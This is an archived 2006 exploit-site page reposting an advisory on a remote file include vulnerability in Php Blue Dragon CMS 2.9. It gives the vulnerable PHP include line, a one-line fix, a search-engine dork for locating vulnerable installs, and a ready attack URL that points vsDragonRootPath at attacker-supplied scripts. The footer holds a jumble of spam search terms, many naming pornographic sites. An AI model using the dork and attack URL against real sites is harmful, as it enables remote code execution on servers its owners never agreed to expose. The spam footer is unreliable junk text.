about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , Php Blue Dragon CMS <= 2.9 Remote File Include Vulnerability




2006-05-12 Php Blue Dragon CMS <= 2.9 Remote File Include Vulnerability 
Rated as : Moderate Risk

################DEVIL TEAM THE BEST POLISH TEAM#################
#Php Blue Dragon Platinum - Remote File Include
#Find by Kacper (Rahim).
#Greetings For ALL DEVIL TEAM members, Special DragonHeart :***
#dork: powered by Php Blue Dragon Platinum
################################################################
[code]
// Szukanie u.ytkownika
include($vsDragonRootPath."public_includes/pub_language/".$UserSession
->
SessionData["SesUserLanguage"]."/mod_privmsg.".$phpExt);
[/code]

Fix:
[code]
// Szukanie u.ytkownika
$vsDragonRootPath = "./";
include($vsDragonRootPath."public_includes/pub_language/".$UserSession
->
SessionData["SesUserLanguage"]."/mod_privmsg.".$phpExt);
[/code]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.site.com/[dragon_path]/public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=[evil_scripts]
securitydot.net - 2006-05-12

Advertising

Copyright 2007, SecurityDot
Sat, 22 Nov 2008 14:16:42 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
Wwwsexycom Fatboobs CMS is Fre kolliwoods Dudhwali.c www,com89 Shakeela Google Ear CMS is Fre wwwxxxsex. mambo remo Macromedia www.700xxx PRIVILEGE wwwxxxsex. mambo Remo CMS is Fre Papular.se Sexas ssxygirls crempie administra Barat tela Sexy girls six v ideo WWW.Sexwor WWW XXL CO hot actres unni Video porn WWW.TRISHA ipso barracude CMS is Fre Saniamirja mambo Remo pksex.com t27t FrontPage ind t361t wwwbadjojo FrontPage t899t Roy CMS is Fre phimset Car Themes CMS is Fre word list